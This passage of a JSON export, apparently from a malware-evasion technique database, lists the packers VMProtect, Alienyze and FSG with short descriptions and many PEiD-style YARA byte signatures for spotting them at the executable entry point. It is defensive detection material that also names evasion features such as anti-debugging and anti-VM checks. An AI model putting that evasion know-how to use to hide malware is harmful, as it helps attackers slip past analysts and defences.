pe.entry_point\r\n\r\n}\r\nrule VMProtect_106107_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 68 00 00 00 00 8B 74 24 28 BF ?? ?? ?? ?? FC 89 F3 03 34 24 AC 00 D8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule VMProtect_07x_08_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 5B 20 56 4D 50 72 6F 74 65 63 74 20 76 20 30 2E 38 20 28 43 29 20 50 6F 6C 79 54 65 63 68 20 5D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _VMProtect_v125_PolyTech_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B 45 00 83 C5 02 66 8B 00 66 89 45 00 E9 A5 06 00 00 8B 45 00 66 8B 55 04 83 C5 06 66 89 10 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _VMProtect_v125_PolyTech: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B 45 00 83 C5 02 66 8B 00 66 89 45 00 E9 A5 06 00 00 8B 45 00 66 8B 55 04 83 C5 06 66 89 10 E9 }\r\n        $b = { 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 53 56 52 56 51 9C 55 57 68 00 00 00 00 8B 74 24 2C 89 E5 81 EC C0 00 00 00 89 E7 03 75 00 8A 06 46 0F B6 C0 FF 34 85 A7 72 45 00 C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}"
                }
            ]
        },
        {
            "id": 190,
            "unprotect_id": "U1409",
            "name": "Alienyze",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "Alienyze is a software packer designed to compress executable files, allowing them to reduce the file size of their software as much as possible.\r\n\r\n\r\n- Anti-Debugger techniques that detect and fool present debuggers\r\n\r\n- Anti-VM techniques that detect sandbox & virtualized environments\r\n\r\n- Protection from disassemblers and software analysis tools\r\n\r\n- Hardware ID locking for making applications machine dependant\r\n\r\n- Integrity checks that detect code patching & tampering\r\n\r\n- Customizable compression and encryption of the applications code\r\n\r\n- Real time protection in running application\r\n\r\n- Project configuration settings Load, Save support\r\n\r\n- Multilingual user interface, language selection support",
            "resources": "https://alienyze.com/",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 189,
            "unprotect_id": "U1408",
            "name": "FSG",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "The free, simple FSG software compresses both small and large files. While it is popular and commonly used to hide malware code, it is also relatively simple to unpack through a decompression loop that writes the data to the final destination.",
            "resources": "https://www.aldeid.com/wiki/Category:Digital-Forensics/Computer-Forensics/Anti-Reverse-Engineering/Packers/FSG",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 107,
                    "key": "yara_detect_fsg",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_detect_FSG",
                    "rule": "rule FSG_v110_Eng_dulekxt_Borland_Cpp_1999_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 2B C8 68 80 ?? ?? 00 EB 02 1E BB 5E EB 02 CD 20 68 B1 2B 6E 37 40 5B 0F B6 C9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_70_ASM: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 01 00 00 00 5A 5E E8 02 00 00 00 BA DD 5E 03 F2 EB 01 64 BB 80 ?? ?? 00 8B FA EB 01 A8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 0F B6 D0 E8 01 00 00 00 0C 5A B8 80 ?? ?? 00 EB 02 00 DE 8D 35 F4 00 00 00 F7 D2 EB 02 0E EA 8B 38 EB 01 A0 C1 F3 11 81 EF 84 88 F4 4C EB 02 CD 20 83 F7 22 87 D3 33 FE C1 C3 19 83 F7 26 E8 02 00 00 00 BC DE 5A 81 EF F7 EF 6F 18 EB 02 CD 20 83 EF 7F EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_FSG_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v131: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 BB ?? ?? ?? ?? B2 80 A4 B6 80 FF D3 73 F9 33 C9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v133: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v10_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 23 CA EB 02 5A 0D E8 02 00 00 00 6A 35 58 C1 C9 10 BE 80 ?? ?? 00 0F B6 C9 EB 02 CD 20 BB F4 00 00 00 EB 02 04 FA EB 01 FA EB 01 5F EB 02 CD 20 8A 16 EB 02 11 31 80 E9 31 EB 02 30 11 C1 E9 11 80 EA 04 EB 02 F0 EA 33 CB 81 EA AB AB 19 08 04 D5 03 C2 80 EA 33 0F B6 C9 0F BE 0E 88 16 EB 01 5F EB 01 6B 46 EB 01 6D 0F BE C0 4B EB 02 CD 20 0F BE C9 2B C9 3B D9 75 B0 EB 01 99 C1 C1 05 91 9D B2 E3 22 E2 A1 E2 F2 22 E2 A0 ?? ?? ?? E2 35 CA EC E2 E2 E2 E4 B4 57 E7 6C F8 28 F4 B4 A5 94 62 15 BD 86 95 E4 E1 F6 06 55 DA 15 AB E1 F6 06 55 FA 15 A2 E1 F6 06 55 03 95 E4 23 92 F2 E1 F6 06 F4 A2 55 DB 57 21 8C CD BE CA 25 E2 E2 E2 0D AD 57 F2 CA 1A E2 E2 E2 CD 0A 8E B3 CA 56 23 F5 AB CD FE 73 2A A3 C2 EA 8E CA 04 E2 E2 E2 1F E2 5F E2 E2 55 EC 62 DE E7 55 E8 65 DA 61 59 E4 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt_WinRAR_SFX_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 02 EB 02 CD 20 B8 80 ?? 42 00 EB 01 55 BE F4 00 00 00 13 DF 13 D8 0F B6 38 D1 F3 F7 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cue_60: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 ?? CF ?? ?? 80 ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_131_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB }\r\n        $b = { C1 E0 06 EB 02 CD 20 EB 01 27 EB 01 24 BE 80 ?? 42 00 49 EB 01 99 8D 1D F4 00 00 00 EB 01 5C F7 D8 1B CA EB 01 31 8A 16 80 E9 41 EB 01 C2 C1 E0 0A EB 01 A1 81 EA A8 8C 18 A1 34 46 E8 01 00 00 00 62 59 32 D3 C1 C9 02 EB 01 68 80 F2 1A 0F BE C9 F7 D1 2A D3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Borland_Cpp_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 2E EB 02 A5 55 BB 80 ?? ?? 00 87 FE 8D 05 AA CE E0 63 EB 01 75 BA 5E CE E0 63 EB 02 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v120_Eng_dulekxt_Microsoft_Visual_Cpp_60_70: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA }\r\n        $b = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA 73 8B CF 81 C2 96 44 EB 04 EB 02 CD 20 88 16 E8 02 00 00 00 44 A2 59 46 E8 01 00 00 00 AD 59 4B 80 C1 13 83 FB 00 75 B2 F7 D9 96 8F 80 4D 0C 4C 91 50 1C 0C 50 8A ?? ?? ?? 50 E9 34 16 50 4C 4C 0E 7E 9B 49 C6 32 02 3E 7E 7B 5E 8C C5 6B 50 3F 0E 0F 38 C8 95 18 D1 65 11 2C B8 87 28 C3 4C 0B 3C AC D9 2D 15 4E 8F 1C 40 4F 28 98 3E 10 C1 45 DB 8F 06 3F EC 48 61 4C 50 50 81 DF C3 20 34 84 10 10 0C 1F 68 DC FF 24 8C 4D 29 F5 1D 2C BF 74 CF F0 24 C0 08 2E 0C 0C 10 51 0C 91 10 10 81 16 D0 54 4B D7 42 C3 54 CB C9 4E }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v130_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_70_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 DB 80 EA BF B9 2F 40 67 BA EB 01 01 68 AF ?? A7 BA 80 EA 9D 58 C1 C2 09 2B C1 8B D7 68 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Cpp_1999_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 2B C8 68 80 ?? ?? 00 EB 02 1E BB 5E EB 02 CD 20 68 B1 2B 6E 37 40 5B 0F B6 C9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_bartxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB 27 ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 07 74 EF FE 07 75 06 47 FF 37 AF EB 09 FE 07 0F 84 1A ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 1B ?? ?? 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PseudoSigner_02_FSG_10: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_50_60_: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 D2 0F BE D2 EB 01 C7 EB 01 D8 8D 05 80 ?? ?? ?? EB 02 CD 20 EB 01 F8 BE F4 00 00 00 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Microsoft_Visual_Cpp_60_70_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C2 2C FB 8D 3D 7E 45 B4 80 E8 02 00 00 00 8A 45 58 68 02 ?? 8C 7F EB 02 CD 20 5E 80 C9 16 03 F7 EB 02 40 B0 68 F4 00 00 00 80 F1 2C 5B C1 E9 05 0F B6 C9 8A 16 0F B6 C9 0F BF C7 2A D3 E8 02 00 00 00 99 4C 58 80 EA 53 C1 C9 16 2A D3 E8 02 00 00 00 9D CE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_FSG_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Borland_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 03 DE EB 01 F8 B8 80 ?? 42 00 EB 02 CD 20 68 17 A0 B3 AB EB 01 E8 59 0F B6 DB 68 0B A1 B3 AB EB 02 CD 20 5E 80 CB AA 2B F1 EB 02 CD 20 43 0F BE 38 13 D6 80 C3 47 2B FE EB 01 F4 03 FE EB 02 4F 4E 81 EF 93 53 7C 3C 80 C3 29 81 F7 8A 8F 67 8B 80 C3 C7 2B FE }\r\n        $b = { C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v133a_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A8 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_: PEiD\r\n{\r\n    strings:\r\n        $a = { 91 EB 02 CD 20 BF 50 BC 04 6F 91 BE D0 ?? ?? 6F EB 02 CD 20 2B F7 EB 02 F0 46 8D 1D F4 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_Microsoft_Visual_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 }\r\n        $b = { 1B DB E8 02 00 00 00 1A 0D 5B 68 80 ?? ?? 00 E8 01 00 00 00 EA 5A 58 EB 02 CD 20 68 F4 00 00 00 EB 02 CD 20 5E 0F B6 D0 80 CA 5C 8B 38 EB 01 35 EB 02 DC 97 81 EF F7 65 17 43 E8 02 00 00 00 97 CB 5B 81 C7 B2 8B A1 0C 8B D1 83 EF 17 EB 02 0C 65 83 EF 43 13 D6 83 C7 32 F7 DA 03 FE EB 02 CD 20 87 FA 88 10 EB 02 CD 20 40 E8 02 00 00 00 F1 F8 5B 4E 2B D2 85 F6 75 AF EB 02 DE 09 EB 01 EF 34 4A 7C BC 7D 3D 7F 90 C1 82 41 ?? ?? ?? 87 DB 71 94 8B 8C 8D 90 61 05 96 1C A9 DA A7 68 5A 4A 19 CD 76 40 50 A0 9E B4 C5 15 9B D7 6E A5 BB CC 1C C2 DE 6C AC C2 D3 23 D2 65 B5 F5 65 C6 B6 CC DD CC 7B 2F B6 33 FE 6A AC 9E AB 07 C5 C6 C7 F3 94 3F DB B4 05 CE CF D0 BC FA 7F A5 BD 4A 18 EB A2 C5 F7 6D 25 9F BF E8 8D CA 05 E4 E5 E6 24 E8 66 EA EB 5F F7 6E EB F5 64 F8 76 EC 74 6D F9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule FSG_v133_Eng_dulekxt: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Basic_50_60_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 CB 10 EB 01 0F B9 03 74 F6 EE 0F B6 D3 8D 05 83 ?? ?? EF 80 F3 F6 2B C1 EB 01 DE 68 77 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Basic_50_60: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 CB 10 EB 01 0F B9 03 74 F6 EE 0F B6 D3 8D 05 83 ?? ?? EF 80 F3 F6 2B C1 EB 01 DE 68 77 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_FSG_10_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Basic_50_60_: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 CB 10 EB 01 0F B9 03 74 F6 EE 0F B6 D3 8D 05 83 ?? ?? EF 80 F3 F6 2B C1 EB 01 DE 68 77 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Microsoft_Visual_Cpp_60_70: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Borland_Delphi_Borland_Cpp_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { C1 F0 07 EB 02 CD 20 BE 80 ?? ?? 00 1B C6 8D 1D F4 00 00 00 0F B6 06 EB 02 CD 20 8A 16 0F B6 C3 E8 01 00 00 00 DC 59 80 EA 37 EB 02 CD 20 2A D3 EB 02 CD 20 80 EA 73 1B CF 32 D3 C1 C8 0E 80 EA 23 0F B6 C9 02 D3 EB 01 B5 02 D3 EB 02 DB 5B 81 C2 F6 56 7B F6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Borland_Delphi_40_50_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 46 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v11_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 ?? BF ?? 10 40 ?? BE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_60_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 D9 80 E1 FE 75 02 49 49 97 A3 ?? ?? 03 C1 24 FE 75 02 48 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_13_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_120_Eng_dulekxt_Microsoft_Visual_Cpp_60_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 CD 20 EB 01 91 8D 35 80 ?? ?? 00 33 C2 68 83 93 7E 7D 0C A4 5B 23 C3 68 77 93 7E 7D EB 01 FA 5F E8 02 00 00 00 F7 FB 58 33 DF EB 01 3F E8 02 00 00 00 11 88 58 0F B6 16 EB 02 CD 20 EB 02 86 2F 2A D3 EB 02 CD 20 80 EA 2F EB 01 52 32 D3 80 E9 CD 80 EA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MASM32_TASM32_Microsoft_Visual_Basic: PEiD\r\n{\r\n    strings:\r\n        $a = { F7 D8 0F BE C2 BE 80 ?? ?? 00 0F BE C9 BF 08 3B 65 07 EB 02 D8 29 BB EC C5 9A F8 EB 01 94 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_MS_Visual_Cpp_Borland_Cpp_Watcom_Cpp: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 C7 85 1E EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 02 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_dulekxt_Microsoft_Visual_Cpp_70: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v110_Eng_dulekxt_Microsoft_Visual_Cpp_50_60_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8D 50 12 2B C9 B1 1E 8A 02 34 77 88 02 42 E2 F7 C8 8C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule FSG_v13: PEiD\r\n{\r\n    strings:\r\n        $a = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 }\r\n        $b = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? ?? 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE ?? 74 EF FE }\r\n        $c = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? ?? 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 